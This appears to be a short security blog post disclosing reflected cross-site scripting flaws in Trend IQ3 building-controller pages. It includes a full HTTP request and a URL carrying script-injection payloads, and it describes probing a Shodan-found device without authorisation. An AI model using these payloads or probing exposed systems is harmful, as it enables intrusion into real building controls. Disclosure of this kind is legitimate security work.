IQ3 Trend LAN Controller – Multiple Reflected XSS

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw I poked at one without authentication. By default you are given system guest access which lets you see the status of components. Some of these pages allow for cross site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf”><alert>(‘DF’)</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

iq3-xss1

2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub pages in the format Z#(W).htm for each of 10 zones. Each of these pages have a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week”><alert>(‘DF’)</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: